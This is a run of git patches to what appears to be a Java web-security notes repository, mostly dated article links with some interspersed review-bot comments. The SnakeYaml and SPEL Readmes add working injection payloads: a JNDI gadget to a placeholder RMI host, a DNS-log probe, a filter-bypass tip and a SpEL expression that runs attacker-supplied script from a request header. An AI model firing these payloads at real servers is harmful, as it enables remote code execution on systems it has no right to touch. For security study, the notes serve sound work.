<63966847+Firebasky@users.noreply.github.com> Date: Fri, 15 Jul 2022 12:52:41 +0800 Subject: [PATCH 099/332] Update Readme.md --- SnakeYaml/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md index cf6bec6..e699ddd 100644 --- a/SnakeYaml/Readme.md +++ b/SnakeYaml/Readme.md @@ -8,6 +8,8 @@ https://xz.aliyun.com/t/10655 +限制了class,不过存在class bean中有object属性 https://mp.weixin.qq.com/s/7HJXfNibY9Z3DPGarTqyZQ + 加载本地 ```java String data2 = "!!javax.script.ScriptEngineManager [\n" + From 167818cf08b5cf2b3a5e63a6d0019d18fa99e5e1 Mon Sep 17 00:00:00 2001 
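Review bot: in PATCH 096/332 (Jboss/README.md) the hunk pastes `web.xml` and two FernFlower-decompiled classes in full, about 490 added lines, without saying which lines the new `## 反序列化漏洞` section is about. Point the reader at them: `mi = (MarshalledInvocation)ois.readObject();` in `ReadOnlyAccessFilter.doFilter` runs before `validateAccess`, the same `readObject()` call sits in `InvokerServlet.processRequest`, and the `HttpInvokers` constraint on `/restricted/*` lists only GET and POST. Trimming the listing to those methods, and keeping the CVE-2017-12149 id that the heading change removes, would make the section usable for someone checking or hardening a deployment.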
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 15 Jul 2022 13:17:26 +0800 Subject: [PATCH 100/332] Update Readme.md --- SnakeYaml/Readme.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md index e699ddd..89be881 100644 --- a/SnakeYaml/Readme.md +++ b/SnakeYaml/Readme.md @@ -23,3 +23,9 @@ String data2 = "!!javax.script.ScriptEngineManager [\n" + ```java String poc = "[!!判断的类全类名 []: 0, !!java.net.URL [null, \"http://ixvoxg.dnslog.cn\"]: 1]"; ``` + +## 其他链 一般是jndi + +``` +!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: "rmi://xxxx", autoCommit: true} +``` From 6f60ab9cd377302f64b3b0edc8108b4437ece805 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 15 Jul 2022 13:20:48 +0800 Subject: [PATCH 101/332] Update Readme.md --- SnakeYaml/Readme.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md index 89be881..b14e92b 100644 --- a/SnakeYaml/Readme.md +++ b/SnakeYaml/Readme.md @@ -3,12 +3,12 @@ ## 不出网利用 >通过写文件然后本地加载rce -//todo 写一个工具 去完成 +//todo 写一个工具 去完成 已经完成了 https://xz.aliyun.com/t/10655 -限制了class,不过存在class bean中有object属性 https://mp.weixin.qq.com/s/7HJXfNibY9Z3DPGarTqyZQ +限制了class,不过存在class bean中有object属性 参考: https://mp.weixin.qq.com/s/7HJXfNibY9Z3DPGarTqyZQ 加载本地 ```java @@ -29,3 +29,5 @@ String data2 = "!!javax.script.ScriptEngineManager [\n" + ``` !!com.sun.rowset.JdbcRowSetImpl {dataSourceName: "rmi://xxxx", autoCommit: true} ``` + +参考: https://www.mi1k7ea.com/2019/11/29/Java-SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E From ef6fb63bae480bb06898555d39d777b1cc2ce472 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 15 Jul 2022 14:19:49 +0800 Subject: [PATCH 102/332] Update Readme.md --- shell/EL/Readme.md | 2 ++ 1 file changed, 2 insertions(+) 
diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md index 24f8a89..56f6390 100644 --- a/shell/EL/Readme.md +++ b/shell/EL/Readme.md @@ -1,5 +1,7 @@ # EL +https://xz.aliyun.com/t/7692 + ## 回显 https://forum.butian.net/share/886 From 8dead4aea8192692eadb399e15f38b3695a8acbe Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 18 Jul 2022 21:53:16 +0800 Subject: [PATCH 103/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 415bb41..54e1208 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -146,3 +146,4 @@ + 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识** + 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/) + 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错** ++ 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818) From fd140a0a0a4cd4c9f4807283ae56ef151b4b9cc4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 15 Aug 2022 23:31:07 +0800 Subject: [PATCH 104/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 54e1208..8945633 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -147,3 +147,4 @@ + 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/) + 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错** + 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818) ++ 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思** From faa7c2e1ecca0d6c88ffc8ae5e3fb05b847274ef Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 16 Aug 2022 13:05:33 +0800 Subject: [PATCH 105/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 8945633..3684b0a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -148,3 +148,4 @@ + 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错** + 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818) + 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思** ++ 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节** From 1167c93eaf24f3a624f3de3351f974627ec9a080 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 20 Aug 2022 00:16:26 +0800 Subject: [PATCH 106/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 3684b0a..675c06c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -149,3 +149,4 @@ + 2022/07/18 [java~通过ClassLoader动态加载类,实现简单的热部署](https://icode.best/i/88333747185426) [java利用classloader实现热部署](https://blog.csdn.net/chaofanwei2/article/details/51298818) + 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思** + 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节** ++ 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet** From 0d0387308e0654181dad0fc745a47270c051b96e Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 22 Aug 2022 15:01:15 +0800 Subject: [PATCH 107/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 675c06c..43d561b 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -150,3 +150,4 @@ + 2022/08/15 [玄武盾的几种绕过姿势](https://mp.weixin.qq.com/s/blPSDeuzQxwbjfdvZFlWQg) **里面的编码有点意思** + 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节** + 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet** ++ 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。** From e60dddad0ab644b13234f3ecb11bf41d840dcee8 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 1 Sep 2022 16:54:36 +0800 Subject: [PATCH 108/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 43d561b..17bc0da 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -151,3 +151,4 @@ + 2022/08/16 [weblogic“伪随机”目录生成算法探究](https://gv7.me/articles/2019/weblogic-pseudo-random-dir-generation-algorithm-exploration/) **比较细节** + 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet** + 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。** ++ 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚** 
From d81bc7d9f602bc8a0dae54484812397d93521ea0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 2 Sep 2022 17:25:55 +0800 Subject: [PATCH 109/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 17bc0da..a2df6be 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -152,3 +152,4 @@ + 2022/08/20 [Java安全攻防之从wsProxy到AbstractTranslet](https://mp.weixin.qq.com/s/HuQV6PNBCW4qSKQVQg8ifA) **学习了反序列化代码执行不需要继承AbstractTranslet** + 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。** + 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚** ++ 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** From 3ad5b0c446a9c11ad2b43d161f07958db950d625 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 10 Sep 2022 00:07:27 +0800 Subject: [PATCH 110/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a2df6be..a1a5905 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -153,3 +153,4 @@ + 2022/08/22 [ysoserial分析之Jython1利用链](https://mp.weixin.qq.com/s/QNrwrv5leC0FN3H4RL6oEg) **等待完善命令执行。。。** + 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚** + 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** ++ 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到** From a2e3591d7a3c6462fb2bec06c45ab15d71eefaa4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 10 Sep 2022 23:37:20 +0800 Subject: [PATCH 111/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a1a5905..74e5f5e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -154,3 +154,4 @@ + 2022/09/01 [手把手带你挖掘spring-cloud-gateway新链](https://forum.butian.net/share/1410) **学到了Idea 快捷键Ctrl + Alt + H来查看调用的层次 比较清楚** + 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** + 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到** ++ 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂** From 4d2bd5b6a7f5249428a5e40916489669e9a34c36 Mon Sep 17 00:00:00 2001 
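Review bot: in PATCH 111/332 the added Xalan-J entry (CVE-2022-34169) links noahblog.360.cn over plain `http://`, where every other entry visible in this hunk uses `https://`; switch the scheme if the host serves it. The annotation `好牛皮 但是看不懂` also records no takeaway, so a one-clause summary of what the article shows (its title names an integer truncation in XSLT) would match the neighbouring entries.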
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 11 Sep 2022 10:56:24 +0800 Subject: [PATCH 112/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 74e5f5e..28e3f61 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -155,3 +155,4 @@ + 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** + 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到** + 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂** ++ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) From c7d87f5c8612076aa446c176d4fdb206cfa92882 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 15 Sep 2022 20:51:20 +0800 Subject: [PATCH 113/332] Create Readme.md --- Undertow/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 Undertow/Readme.md diff --git a/Undertow/Readme.md b/Undertow/Readme.md new file mode 100644 index 0000000..16d8a83 --- /dev/null +++ b/Undertow/Readme.md @@ -0,0 +1,5 @@ +# Undertow + +https://blog.csdn.net/hollis_chuang/article/details/104470945 + +http://blog.hubwiz.com/2016/12/01/webserver-Undertow/ From b63b51024c3f51494e8d85f269904f4ae037e6be Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 13:35:31 +0800 Subject: [PATCH 114/332] Update Readme.md --- shell/SPEL/Readme.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index c83f309..2e57962 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md @@ -1,5 +1,7 @@ # SPEL +>new关键字大小写可以绕过 + ## poc ```java @@ -45,6 +47,7 @@ T(org.springframework.cglib.core.ReflectUtils).defineClass('Singleton',T(com.sun #{T(org.springframework.cglib.core.ReflectUtils).defineClass('Memshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAA....'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()} +${''.getClass().forName('java.script.ScriptEngineManager').newInstance().getEngineByName("nashorn").eval(#request.getHeader('User-Agent'))} echo From aff8eaec8c511a05428772a3ea5701e0e3280d80 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 17:10:08 +0800 Subject: [PATCH 115/332] Update Readme.md --- shell/SPEL/Readme.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index 2e57962..b0acffd 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md @@ -111,7 +111,8 @@ print(')}') 其他bypass: https://xz.aliyun.com/t/9245 ## 参考 - +> https://xz.aliyun.com/t/9245 **可以使用#request.getRequestedSessionId() 或者 #request.getHeader('User-Agent') 反正可以使用request对象或者respose** +> >https://www.cnblogs.com/bitterz/p/15206255.html > >https://landgrey.me/blog/15/ From c337e11d2e0c3cb385652b8ee7fc35aefe7916af Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 20:50:14 +0800 Subject: [PATCH 116/332] Create jetty --- jetty | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 jetty 
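Review bot: in PATCH 115/332 (shell/SPEL/Readme.md, under `## 参考`), the added quote line repeats the URL `https://xz.aliyun.com/t/9245` that the unchanged line `其他bypass: https://xz.aliyun.com/t/9245` just above the heading already carries, and `respose` is a typo for `response`. Suggest attaching the remark about `#request.getRequestedSessionId()` and `#request.getHeader('User-Agent')` to the existing link instead of listing the URL twice, and fixing the spelling.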
diff --git a/jetty b/jetty new file mode 100644 index 0000000..aefe916 --- /dev/null +++ b/jetty @@ -0,0 +1,5 @@ +# jetty + +比较好的文章 + +https://swarm.ptsecurity.com/tag/web-application-security/ From d160b9a1e472c722fb846f0c600ad772c9127601 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 20:50:54 +0800 Subject: [PATCH 117/332] Delete jetty --- jetty | 5 ----- 1 file changed, 5 deletions(-) delete mode 100644 jetty diff --git a/jetty b/jetty deleted file mode 100644 index aefe916..0000000 --- a/jetty +++ /dev/null @@ -1,5 +0,0 @@ -# jetty - -比较好的文章 - -https://swarm.ptsecurity.com/tag/web-application-security/ From cca34aa995753884be80e17f29e1c4cabec07f9d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 20:51:25 +0800 Subject: [PATCH 118/332] Create Readme.md --- Jetty/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 Jetty/Readme.md diff --git a/Jetty/Readme.md b/Jetty/Readme.md new file mode 100644 index 0000000..c036d30 --- /dev/null +++ b/Jetty/Readme.md @@ -0,0 +1,5 @@ +# Jetty + +好文章: + +https://swarm.ptsecurity.com/tag/web-application-security/ From cb7c7d5c7e9159c1e4979bb589bd9df5447430b3 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Sep 2022 21:11:04 +0800 Subject: [PATCH 119/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 28e3f61..2243d30 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -155,4 +155,5 @@ + 2022/09/02 [代码审计之洞态IAST 0day挖掘](https://mp.weixin.qq.com/s/LDBwhQYiiZ8heOiJl83JFQ) **感觉一般** + 2022/09/10 [Groovy Template Engine Exploitation – Notes from a real case scenario](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) **Groovy Template Engine Exploitation 说不定以后遇到** + 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂** -+ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) ++ 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) ++ 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce** From 312f9323aa901d1543bd57e43078170e44420cf0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Sep 2022 23:36:50 +0800 Subject: [PATCH 120/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2243d30..add100f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -157,3 +157,4 @@ + 2022/09/10 [Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)](http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/) **好牛皮 但是看不懂** + 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) + 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce** ++ 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg) From 48ee10b76006bf6a2d01b6ab7242525ed0d92933 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 19 Sep 2022 00:21:26 +0800 Subject: [PATCH 121/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index add100f..6ac687a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -158,3 +158,4 @@ + 2022/09/11 [通过动态链接库绕过反病毒软件Hook - Break JVM](https://mp.weixin.qq.com/s?__biz=MzA4NzQwNzY3OQ==&mid=2247483882&idx=1&sn=011c3f231d38d899bcf8bf21010616a0&chksm=9038acbaa74f25acd2983131a4b309424985fde3538cd8a93409336e317a4393350f75c7e334&scene=132#wechat_redirect) + 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce** + 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg) ++ 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A) From 5e790ec8cb65a3cae8b3bdfc0f2c3ca05355558f Mon Sep 17 00:00:00 2001 
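Review bot: in PATCH 118/332 (Jetty/Readme.md), the only link under `好文章:` is `https://swarm.ptsecurity.com/tag/web-application-security/`, which is a tag listing rather than an article, so the file never says which post is about Jetty and the target changes as the blog adds posts. Suggest linking the specific article with its title, in the `+ date [title](url) **note**` form the java日常 list uses. PATCH 116 and 117 create and then delete the same five lines as a top-level `jetty` file; squashing the three commits would leave only this one.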
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 20 Sep 2022 21:14:05 +0800 Subject: [PATCH 122/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6ac687a..25d842d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -159,3 +159,4 @@ + 2022/09/16 [研究 XSS 到 RCE 缺陷的开源应用程序](https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/) **xss->rce** + 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg) + 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A) ++ 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊** From bf60900e50187054bbc1e75c4a7cfd49a3d84dcf Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 23 Sep 2022 14:49:19 +0800 Subject: [PATCH 123/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff 